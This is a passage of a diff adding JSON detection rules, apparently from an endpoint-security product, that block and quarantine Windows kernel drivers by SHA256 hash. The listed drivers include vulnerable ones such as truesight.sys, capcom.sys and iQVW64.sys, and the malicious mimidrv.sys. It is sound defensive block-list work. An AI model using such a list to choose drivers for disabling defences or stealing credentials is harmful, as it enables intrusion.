+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826561Z",
+ "creation_date": "2026-03-23T11:45:31.826563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24d83f41ff581dc60a415e120a116d5eff990ef1b69aa9fe789fb3267a426b0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c646f6d8-0f0b-5918-a915-84669bdf6b85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622332Z",
+ "creation_date": "2026-03-23T11:45:29.622333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac63c26ca43701dddaa7fb1aea535d42190f88752900a03040fd5aaa24991e25",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c64967b4-9f69-5453-93e3-4ab401019d71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620727Z",
+ "creation_date": "2026-03-23T11:45:29.620729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6540105-56a5-53b6-bf42-786684afeb95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822159Z",
+ "creation_date": "2026-03-23T11:45:31.822162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4d236ed7c038b4e10fbe8450ef16a742e8d676a3ace46b277d362afa353f5b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c65ad857-a81f-5b4b-9000-16b474a59930",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972125Z",
+ "creation_date": "2026-03-23T11:45:29.972127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de3597ae7196ca8c0750dce296a8a4f58893774f764455a125464766fcc9b3b5",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6902eef-c776-5c7c-806c-8815ef29c1aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819620Z",
+ "creation_date": "2026-03-23T11:45:30.819622Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a47555d04b375f844073fdcc71e5ccaa1bbb201e24dcdebe2399e055e15c849f",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c694bd3b-3829-5964-91c9-5ce270c0c7c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835463Z",
+ "creation_date": "2026-03-23T11:45:30.835466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac258fa5a7211a4785242948f9055eca6e7177ccbd7b8d109c18d09d8db1e1d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6a67b3b-8d8e-57df-a827-271916379d95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606209Z",
+ "creation_date": "2026-03-23T11:45:29.606211Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d5ebd0f4585ec20a5fe3c5276df13ece5a2645d3d6f70cedcda979bd1248fc2",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6aa65a4-cc68-5b6e-aae7-8c80a29eb84b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490802Z",
+ "creation_date": "2026-03-23T11:45:31.490805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d0ad33174b9749167b5f5433429c01e2628772e283913602ac0b912b12bd54f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6b1f2eb-f20d-5c37-b0e1-91e329f78a62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479350Z",
+ "creation_date": "2026-03-23T11:45:30.479352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bb0418dcfb3fa15f01220dc039f2c9ad4dc12eb7f0396deaa9b2e81cb5e77e9",
+ "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv_1_0_32.sys) [https://www.loldrivers.io/drivers/02e4a30f-8aa8-4ff0-8e02-1bff1d0f088f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6b9bc7a-20ac-52cb-8548-ec2cb9a2ab9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829663Z",
+ "creation_date": "2026-03-23T11:45:31.829665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829670Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0a7160d94f89e3d8e05e60e0d83effe9cf7eb4ec57332262a9bcbe8d2a28c03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6e3f4e4-982b-5f84-b191-18cdf6292cc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466836Z",
+ "creation_date": "2026-03-23T11:45:30.466839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "773b4a1efb9932dd5116c93d06681990759343dfe13c0858d09245bc610d5894",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6ea4fde-ed4a-5c04-95a1-9f10bf16b514",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622122Z",
+ "creation_date": "2026-03-23T11:45:29.622124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "faa08cb609a5b7be6bfdb61f1e4a5e8adf2f5a1d2492f262483df7326934f5d4",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6fce826-ca27-5c3f-b46a-7cd1694c5e80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144305Z",
+ "creation_date": "2026-03-23T11:45:31.144307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "614885fc4266dd1f9c226122b53cb75091160eadad62fe49847a700402d3d2e9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c6fe2be1-565d-5e3b-9ae8-fb49b1669d71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980550Z",
+ "creation_date": "2026-03-23T11:45:29.980552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9e0f35da47fe91d887a28a0670d8e79ceef7c61ff6d9af3d0568a9737fe0673",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c70086a3-55d7-5b4c-8f98-6caca139a5ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458372Z",
+ "creation_date": "2026-03-23T11:45:30.458375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d640783395631c1b4878ac7945f227c4c4f64fe26dd30cbed755dc440931e85",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c707ff43-a1f1-5727-b9ed-a8bffbd035ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483436Z",
+ "creation_date": "2026-03-23T11:45:31.483440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483450Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d05196b08b66c4bf94dd48b6ff4f5702af5ce08c9e8cb40d7003a5be36636adb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c708acf4-da75-5da9-a438-6f36920f4302",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455669Z",
+ "creation_date": "2026-03-23T11:45:30.455673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ac08a6035cfcafdac712d7c3cf2eef6e10258f14cee6e80e1ef2f71f5045173",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c71cd79f-8bd4-5d3d-a6cf-c9f3c6df82ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466495Z",
+ "creation_date": "2026-03-23T11:45:30.466498Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95e5b5500e63c31c6561161a82f7f9373f99b5b1f54b018c4866df4f2a879167",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7282470-80ce-5051-a8bb-0c508242200e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826262Z",
+ "creation_date": "2026-03-23T11:45:30.826265Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826270Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c360ca22ac7cc6d6d307d7bfb8179021942d5d80b32536cf644753a4b3201139",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c729f119-7a95-5ae4-910b-5a47a3c965b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160685Z",
+ "creation_date": "2026-03-23T11:45:31.160687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04d1544916acf49af24dde775f6a733f9e6e6b9ecc15205429c9e651e5825ee6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c73163f2-a977-548c-8268-6feed478acc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831695Z",
+ "creation_date": "2026-03-23T11:45:30.831697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a3cf88acf373c48ce7b9994d9178b167c26b78925bec161179c2b67d57cf438",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c73980bc-4860-517e-97f4-2d51f6d7eb4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
